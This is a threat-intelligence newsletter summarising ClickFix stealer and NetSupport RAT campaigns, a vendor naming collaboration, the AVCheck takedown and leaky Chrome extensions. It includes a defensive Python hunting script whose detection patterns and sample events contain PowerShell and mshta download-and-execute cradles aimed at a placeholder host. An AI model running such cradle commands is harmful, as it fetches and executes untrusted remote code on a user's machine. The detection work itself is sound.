Triaging the Week 073

Hello there 👋 

Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!


Top 5 News Stories


EDDIESTEALER Malware Exploits ClickFix to Steal Sensitive Browser Data

A new Rust-based malware, EDDIESTEALER, is spreading via fake CAPTCHA pages using the ClickFix tactic to trick users into running malicious PowerShell scripts. It bypasses Chrome’s encryption to steal credentials, browser data, and crypto wallet details.  

Key takeaways: 

🕵️ Sophisticated Delivery: EDDIESTEALER leverages the ClickFix social engineering tactic, using fake CAPTCHA pages on compromised websites to deceive users into executing malicious PowerShell scripts, initiating the infection chain. 

🔒 Bypassing Security: Written in Rust, the malware employs obfuscation techniques such as XOR encryption and symbol stripping, and bypasses Chrome’s app-bound encryption to steal sensitive data, including cookies, passwords, and cryptocurrency wallet details. 

💻 Cross-Platform Threat: The campaign targets multiple platforms (Windows, macOS, Android, iOS) using tailored attack chains, including browser redirections and drive-by downloads, to deploy EDDIESTEALER and other malware, such as Atomic macOS Stealer. 

🛡️ Evasion Techniques: EDDIESTEALER uses anti-sandbox checks, self-deletion via NTFS Alternate Data Streams, and dynamic command-and-control (C2) tasking to evade detection and adapt its behavior, making it a stealthy threat. 

🚨 Wider Context: This campaign aligns with Operation Endgame, which disrupted similar malware operations, highlighting the growing use of ClickFix by both cybercriminals and state-sponsored actors to distribute infostealers. 

🎯 Threat Hunting Package 

Elastic Security Labs 

Fake DocuSign and Gitcode Sites Deliver NetSupport RAT via Sophisticated PowerShell Attack

Fake DocuSign and Gitcode websites are tricking users into running malicious PowerShell scripts that deploy NetSupport RAT, giving attackers remote control of infected systems. The multi-stage attack combines clipboard poisoning with social engineering to evade detection; users should verify a site's legitimacy before following any instruction to paste and run a command.

Key takeaways: 

🕵️ Deceptive Lures: Fraudulent websites mimicking DocuSign and Gitcode trick users into copying a malicious PowerShell command to the clipboard and pasting it into the Windows Run dialog, with links to the sites spread through email and social-media social engineering. 

🖥️ Multi-Stage Attack: The initial script downloads additional PowerShell scripts from an external server (tradingviewtool[.]com), which fetch a ZIP file containing an executable (jp2launcher.exe) that ultimately deploys NetSupport RAT for remote access. 

🔒 Evasion Tactics: The attack’s multi-layered script chain, hosted on domains like docusign.sa[.]com, is designed to evade detection and resist security takedowns, with similarities to the SocGholish campaign noted in October 2024. 

🦠 NetSupport RAT Impact: Once installed, NetSupport RAT grants attackers full remote control, allowing them to steal data, manipulate systems, and potentially deploy further malware on compromised Windows systems. 

🛡️ Mitigation Advice: Users should avoid executing unsolicited scripts, verify website domains, and deploy endpoint detection tools to monitor for suspicious PowerShell activity and block unauthorized remote access attempts.  

🎯 Threat Hunting Package 

DomainTools Investigations 
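Both ClickFix stories above end at the same place on the endpoint: a user pastes a one-liner into the Windows Run dialog, and explorer.exe spawns powershell.exe (or mshta.exe) with a download cradle. The check below is an added example of how to hunt for that on process-creation telemetry and on the Run dialog's own history in the RunMRU registry key; it is not code from Elastic Security Labs or DomainTools, and the sample events, the example.invalid domains and the pattern weights are all constructed assumptions.

```python
"""Hunt for ClickFix-style execution: a user pasting a PowerShell or mshta
one-liner into the Windows Run dialog. Added example; events and domains are
constructed, and the weights are assumptions, not Elastic or DomainTools code."""
import re
from dataclasses import dataclass

# Fragments a paste-and-run cradle usually contains. Each hit adds its weight;
# a single http:// on its own is not enough to alert.
CRADLE_PATTERNS = {
    r"\b(?:iwr|invoke-webrequest|curl|wget)\b": 2,            # fetch stage
    r"\b(?:iex|invoke-expression)\b": 3,                      # in-memory execution
    r"downloadstring|downloadfile": 3,                        # .NET WebClient cradle
    r"-(?:e|ec|enc|encodedcommand)\b\s+[a-z0-9+/=]{20,}": 3,  # base64 payload
    r"-w(?:indowstyle)?\s+h(?:idden)?\b": 2,                  # hide the console
    r"-(?:ep|executionpolicy)\s+bypass": 1,
    r"\bmshta\b.*https?://": 3,                               # remote HTA
    r"https?://": 1,
}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
ALERT_THRESHOLD = 4


@dataclass
class ProcEvent:
    """Subset of a Sysmon Event ID 1 / Security 4688 record."""
    image: str
    parent_image: str
    command_line: str
    user: str


def score_command_line(cmd: str) -> int:
    low = cmd.lower()
    return sum(w for pat, w in CRADLE_PATTERNS.items() if re.search(pat, low))


def is_clickfix_candidate(ev: ProcEvent) -> bool:
    child = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    # The Run dialog belongs to the shell, so the interpreter is a direct
    # child of explorer.exe. Cradles launched by tasks or services need a
    # separate rule and are deliberately not matched here.
    if child not in INTERPRETERS or parent != "explorer.exe":
        return False
    return score_command_line(ev.command_line) >= ALERT_THRESHOLD


def runmru_hits(runmru: dict) -> list:
    """Run-dialog history lives under HKCU\\...\\Explorer\\RunMRU; each value is
    the typed command followed by '\\1'. Return the entries that look like cradles."""
    hits = []
    for name, value in runmru.items():
        if name == "MRUList":  # ordering string, not a command
            continue
        cmd = value[:-2] if value.endswith("\\1") else value
        if score_command_line(cmd) >= ALERT_THRESHOLD:
            hits.append(cmd)
    return hits


# Constructed sample telemetry. example.invalid is a reserved, non-routable name.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell -w hidden -ep bypass -c "iwr -useb http://example.invalid/verify.ps1 | iex"',
              "CORP\\alice"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
              "CORP\\bob"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe",
              'powershell -w hidden -c "iex (iwr http://example.invalid/t)"',
              "NT AUTHORITY\\SYSTEM"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\explorer.exe",
              "mshta https://example.invalid/captcha.hta",
              "CORP\\carol"),
]
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell -w h -c "iex (iwr http://example.invalid/v)"\\1',
}


def hunt(events=SAMPLE_EVENTS, runmru=SAMPLE_RUNMRU) -> dict:
    """Return the users whose process tree matched and the RunMRU entries that did."""
    return {
        "process_hits": [ev.user for ev in events if is_clickfix_candidate(ev)],
        "runmru_hits": runmru_hits(runmru),
    }


if __name__ == "__main__":
    for k, v in hunt().items():
        print(k, v)
```

The parent check is what separates a ClickFix paste from the many benign PowerShell launches on a workstation; the SYSTEM-owned cradle under svchost.exe in the sample is real malicious-looking activity but belongs to a different rule (scheduled tasks and services), which is why it is intentionally not matched here. RunMRU survives a reboot and is worth pulling during triage even when process telemetry has rolled over.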

Microsoft and CrowdStrike Collaborate to Standardize Cyber Threat Actor Naming

Microsoft and CrowdStrike have teamed up to map aliases for cyber threat groups, enhancing clarity in tracking hackers across their platforms. This initiative aims to streamline threat intelligence and improve response times for defenders without enforcing a single naming standard. 

Key takeaways: 

🤝 Strategic Partnership: On June 2, 2025, Microsoft and CrowdStrike announced a collaboration to integrate their respective naming systems for threat actors, mapping aliases such as Microsoft’s “Octo Tempest” to CrowdStrike’s “Scattered Spider” for improved clarity. 

📊 Threat Actor Reference Guide: Microsoft has updated its threat actor reference guide to include a list of common hacking groups, cross-referencing names used by both companies to help defenders align intelligence and respond more effectively. 

🌐 Community-Driven Initiative: The effort is designed to encourage other security firms to join, sharing telemetry data to create a unified view of malicious campaigns. CrowdStrike’s Adam Meyers emphasizes the need for a community-led approach. 

🔍 No Unified Standard: The partnership avoids creating a single naming convention, instead focusing on connecting existing aliases to reduce confusion in the cybersecurity community while maintaining each company’s naming methodology. 

🚀 Broader Impact: By aligning threat intelligence, the initiative aims to help network defenders translate naming systems, build accurate threat profiles, and stay ahead of sophisticated cyberattacks, such as those linked to groups like Scattered Spider.  

Microsoft Security 

International Law Enforcement Dismantles AVCheck, a Key Cybercriminal Tool

International law enforcement has shut down AVCheck, a notorious counter-antivirus service used by cybercriminals to evade detection. The operation, part of Operation Endgame, seized servers and user data, disrupting global cybercrime networks.  

Key takeaways: 

🚨 Takedown Operation: On May 27, 2025, a global law enforcement effort led by the U.S. Department of Justice and the Dutch National Police seized AVCheck.net, a major counter-antivirus (CAV) service used by cybercriminals to test the detectability of malware. 

🕵️ International Collaboration: The operation involved authorities from the U.S., Netherlands, France, Germany, Denmark, Portugal, Ukraine, and Finland, targeting AVCheck’s infrastructure, including servers and user databases. 

🖥️ Service Details: AVCheck allowed registered users to scan files against 26 antivirus engines and check domains/IPs against 22 engines, helping cybercriminals refine malware to bypass security defenses. 

🔒 Impact on Cybercrime: The takedown, linked to Operation Endgame, is expected to disrupt cybercriminal activities, including ransomware attacks, by limiting their ability to test and deploy undetectable malware. 

📊 Seized Assets: Authorities have confiscated AVCheck’s servers and user data, including usernames, emails, and payment details, which may aid further investigations into cybercriminal networks. 

Netherlands Team High Tech Crime 

Popular Chrome Extensions Leak API Keys and User Data Over Unencrypted HTTP

Popular Chrome extensions, such as SEMrush and Browsec VPN, leak API keys and user data over unencrypted HTTP, exposing that traffic to interception and manipulation. Users are advised to uninstall the affected extensions and review the permissions of those they keep.

Key takeaways:

🔓 Unencrypted Data Transmission: Several widely used Chrome extensions, including SEMrush, Browsec VPN, and Microsoft Editor, transmit sensitive user data and API keys over unencrypted HTTP, exposing millions of users to adversary-in-the-middle (AitM) attacks that can read or modify the data in transit.

🕵️ Hardcoded Secrets: These extensions contain hardcoded API keys and secrets within their code, which attackers can extract to manipulate data, access accounts, or cause financial losses, as highlighted by Symantec’s findings, which identified over 21 million users at risk.

🚨 Specific Risks: For example, Browsec VPN’s uninstall URL (browsec-uninstall.s3-website.eu-central-1.amazonaws[.]com) uses HTTP, making it vulnerable to interception, while other extensions expose keys that could lead to unauthorized access or data breaches.

🛡️ Mitigation Steps: Users should uninstall risky extensions, limit extension permissions, regularly audit installed add-ons, and ensure browsers are updated to the latest version to reduce exposure to these vulnerabilities.

⚠️ Ongoing Threat: Any secret embedded in client-side extension code can be extracted by whoever installs the extension, so a hard-coded key can never be treated as confidential; developers should keep privileged calls behind their own back end and send all traffic over HTTPS. No fixes have yet been confirmed for the affected extensions.

Symantec


Top Tips of the Week


Threat Intelligence

  • Integrate CTI into incident response processes. Proactive threat intelligence enhances swift and effective incident handling. 
  • Collaborate with external CTI experts for threat assessments. Leverage their specialized knowledge to enhance your organization’s threat intelligence capabilities. 

Threat Hunting

  • Understand the tactics, techniques, and procedures (TTPs) of threat actors so you can recognize their activity and respond effectively. 
  • Embrace a threat-centric mindset in cyber threat hunting. Infuse threat intelligence into your organization’s DNA for a proactive cybersecurity culture. 
  • Learn from historical incidents in cyber threat hunting. Analyzing past events provides insights for improving threat intelligence and incident response. 
  • Collaborate with threat hunters from different sectors in cyber threat hunting. Cross-industry insights enhance your detection capabilities. 

Custom Tooling

  • Collaborate with threat intelligence teams in custom tool development. Leverage real-time insights to enhance threat detection capabilities. 

Feature Article


In today’s complex cyber landscape, organizations face a critical challenge: determining which threats deserve their limited resources and attention. Threat profiling offers a systematic solution, cutting through the noise to identify and prioritize adversaries most likely to target your organization. 

Rather than attempting to defend against everything, which is impossible, threat profiling helps you understand your real threats, how they operate, and where to focus your defenses. It transforms abstract threats into concrete profiles you can act on, shifting from reactive security to proactive defense. 

This guide will walk you through the structured process of identifying, analyzing, and documenting the threats that matter most, empowering you to dramatically improve your security posture and resource allocation. 

Read Now 


Learning Resources


Are You Using AI Wrong?

In this video, Jeremy makes a bold case: the biggest barrier to AI adoption isn’t tech—it’s mindset. 

He explores how non-technical professionals can unlock game-changing creativity by shifting their mindset: make AI a creative companion rather than a mere instrument. 

🤝 Stop treating AI as a tool. Start treating it like a teammate. 

❓ Ask AI to ask you questions—it can guide you better than most tools ever could. 

💪 Creativity isn’t magic—it’s discipline. “Do more than the first thing you think of.” 

⏳ AI can simulate tough conversations, craft business ideas, and even cut 2 days of admin down to 45 minutes. 

The most powerful point? Everyone has creative potential. With the right mindset, you can do more than you think—with a partner you’ve just begun to explore. 

How to Report Phishing Campaigns

This excellent presentation describes how you can better report phishing results to executives. It’s packed with actionable insight for cybersecurity pros, especially in GRC and awareness roles! 

The presenter doesn’t just teach you how to run phishing simulations using tools like Gophish and Evilginx – he shows how to communicate results to execs in a way that actually lands. No more hearing “That makes no sense.” 

Top takeaways: 

✅ Use binary metrics (sent, clicked, submitted) for clarity—avoid fluff like open rates. 

✅ Embrace data storytelling with pivot tables, XLOOKUPs, and Gantt charts to build credibility. 

✅ Keep the culture supportive, not punitive—focus on improvement, not shame. 

✅ Show execs how click rates translate to real organizational risk with role-based breakdowns. 

Highly recommend this to anyone presenting security data, running phishing campaigns, or just trying to communicate security more effectively. 

Vibe Coding 101

Vibe coding is all the rage!  

This easily approachable guide will introduce you to AI-assisted coding by walking you through how to build a Super Mario-style browser game using Cursor (AI code editor) and Kaboom.js. No prior coding experience required!  

It covers everything from installing tools and writing your first prompt to debugging like a pro using AI support and browser dev tools.  

What stood out: 

💬 AI like Claude 3.5/3.7 guides the coding process step by step. 

🧠 Beginners are taught to think critically—debugging, researching, and consulting documentation. 

🎮 Even if AI struggles, the creator shows how persistence and problem-solving still matter. 

If you’re new to programming or exploring how AI can accelerate software creation, this is a must-watch. It’s a great primer on how “vibe coding” is making software development more accessible. 

A Tabletop Game for Cyber Security

Backdoors & Breaches is a tabletop game that transforms cybersecurity training into an engaging, strategic experience. 

Created in 2019 and first launched at DerbyCon, this game sold 4,000 decks in just 24 hours and has since empowered thousands of professionals and educators. From detecting phishing attacks and compromised web servers to navigating chaos like infected HVAC systems, the game forces players to think critically, simulate real-world breaches, and collaborate under pressure. 

🎲 The twist? You roll dice to simulate success or failure—mirroring the unpredictability of real-life incident response. It’s a fun, effective way to assess team readiness and security posture. 

Highly recommend checking out the video if you want to make cybersecurity training less lecture, more experience.